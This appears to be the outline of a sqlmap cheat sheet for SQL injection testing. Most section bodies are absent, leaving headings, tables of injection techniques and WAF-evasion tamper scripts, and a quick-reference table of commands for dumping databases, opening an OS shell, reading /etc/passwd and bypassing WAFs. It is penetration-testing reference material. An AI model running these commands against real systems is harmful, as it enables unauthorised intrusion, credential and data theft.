Basic Usage
Request Options
POST Data
Cookie
Headers
From Burp Request File
Custom Injection Point
Enumeration
Current Info
Techniques
| Flag | Technique |
|---|---|
B | Boolean-based blind |
E | Error-based |
U | UNION query |
S | Stacked queries |
T | Time-based blind |
OS Shell & File Access
OS Shell
SQL Shell
File Read
File Write
WAF / IDS Evasion
Tamper Scripts
Common Tampers
| Tamper | Description |
|---|---|
space2comment | Replace spaces with /**/ |
between | Replace > with NOT BETWEEN 0 AND |
randomcase | Random upper/lower case |
charencode | URL-encode characters |
equaltolike | Replace = with LIKE |
base64encode | Base64 encode payload |
apostrophemask | Replace ' with UTF-8 |
space2plus | Replace spaces with + |
List All Tampers
Other Evasion
Performance
| Level | Tests |
|---|---|
| 1 | GET/POST parameters |
| 2 | + Cookie |
| 3 | + User-Agent, Referer |
| 4 | + more payloads |
| 5 | + Host header |
Proxy & Tor
Second-Order Injection
Quick Reference
| Task | Command |
|---|---|
| Auto scan | sqlmap -u URL --batch --dbs |
| Dump table | sqlmap -u URL -D db -T tbl --dump |
| OS shell | sqlmap -u URL --os-shell |
| Read file | sqlmap -u URL --file-read="/etc/passwd" |
| WAF bypass | sqlmap -u URL --tamper=space2comment --random-agent |
| From Burp | sqlmap -r request.txt -p param |